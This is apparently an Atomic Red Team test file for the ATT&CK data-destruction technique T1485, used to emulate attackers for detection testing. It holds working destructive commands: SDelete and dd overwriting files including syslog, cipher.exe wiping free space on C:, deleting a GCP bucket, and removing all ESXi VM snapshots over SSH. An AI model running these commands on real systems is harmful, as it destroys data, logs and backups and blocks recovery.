Nathan
165 lines
6.7 KiB
YAML
165 lines
6.7 KiB
YAML
attack_technique: T1485
|
|
display_name: Data Destruction
|
|
atomic_tests:
|
|
- name: Windows - Overwrite file with SysInternals SDelete
|
|
auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2
|
|
description: |
|
|
Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
|
|
the powershell session along with other information about the file that was deleted.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
sdelete_exe:
|
|
description: Path of sdelete executable
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\Sdelete\sdelete.exe
|
|
file_to_delete:
|
|
description: Path of file to delete
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\T1485.txt
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Secure delete tool from SysInternals must exist on disk at specified location (#{sdelete_exe})
|
|
prereq_command: |
|
|
if (Test-Path "#{sdelete_exe}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip"
|
|
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sdelete" -Force
|
|
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" -Force
|
|
executor:
|
|
command: |
|
|
if (-not (Test-Path "#{file_to_delete}")) { New-Item "#{file_to_delete}" -Force }
|
|
& "#{sdelete_exe}" -accepteula "#{file_to_delete}"
|
|
name: powershell
|
|
- name: FreeBSD/macOS/Linux - Overwrite file with DD
|
|
auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146
|
|
description: |
|
|
Overwrites and deletes a file using DD.
|
|
To stop the test, break the command with CTRL/CMD+C.
|
|
supported_platforms:
|
|
- linux
|
|
- macos
|
|
input_arguments:
|
|
overwrite_source:
|
|
description: Path of data source to overwrite with
|
|
type: path
|
|
default: /dev/zero
|
|
file_to_overwrite:
|
|
description: Path of file to overwrite and remove
|
|
type: path
|
|
default: /var/log/syslog
|
|
executor:
|
|
command: |
|
|
dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes
|
|
name: sh
|
|
- name: Overwrite deleted data on C drive
|
|
auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19
|
|
description: |
|
|
RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover.
|
|
This process is very slow and test execution may timeout.
|
|
https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware
|
|
https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
cipher.exe /w:C:
|
|
name: command_prompt
|
|
- name: GCP - Delete Bucket
|
|
auto_generated_guid: 4ac71389-40f4-448a-b73f-754346b3f928
|
|
description: |
|
|
This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
|
|
|
|
Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
|
|
This atomic will create a bucket then delete the bucket.
|
|
|
|
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
|
|
supported_platforms:
|
|
- iaas:gcp
|
|
input_arguments:
|
|
project_id:
|
|
description: ID of the GCP Project you to execute the command against.
|
|
type: string
|
|
default: atomic-test-1
|
|
bucket_name:
|
|
description: The name of the bucket to delete.
|
|
type: string
|
|
default: atomic-red-team-bucket
|
|
executor:
|
|
name: sh
|
|
elevation_required: false
|
|
command: |
|
|
gcloud config set project #{project_id}
|
|
gcloud storage buckets delete gs://#{bucket_name}
|
|
cleanup_command: |
|
|
cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
|
|
terraform state rm google_storage_bucket.bucket
|
|
terraform destroy -auto-approve
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
Requires gcloud
|
|
prereq_command: |
|
|
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
|
|
- description: |
|
|
Check if user is logged in
|
|
prereq_command: |
|
|
gcloud config get-value account
|
|
get_prereq_command: |
|
|
gcloud auth login --no-launch-browser
|
|
- description: |
|
|
Check if terraform is installed.
|
|
prereq_command: |
|
|
terraform version
|
|
get_prereq_command: |
|
|
echo Please install the terraform.
|
|
- description: |
|
|
Create dependency resources using terraform
|
|
prereq_command: |
|
|
stat "$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate"
|
|
get_prereq_command: |
|
|
cd "$PathToAtomicsFolder/T1485/src/T1485-4/"
|
|
terraform init
|
|
terraform apply -auto-approve
|
|
- name: ESXi - Delete VM Snapshots
|
|
auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1
|
|
description: |
|
|
Deletes all snapshots for all Virtual Machines on an ESXi Host
|
|
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
vm_host:
|
|
description: Specify the host name or IP of the ESXi server.
|
|
type: string
|
|
default: atomic.local
|
|
vm_user:
|
|
description: Specify the privilege user account on the ESXi server.
|
|
type: string
|
|
default: root
|
|
vm_pass:
|
|
description: Specify the privileged user's password.
|
|
type: string
|
|
default: password
|
|
plink_file:
|
|
description: Path to Plink
|
|
type: path
|
|
default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Check if we have plink
|
|
prereq_command: |
|
|
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
|
|
executor:
|
|
command: |
|
|
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done"
|
|
name: command_prompt
|
|
elevation_required: false |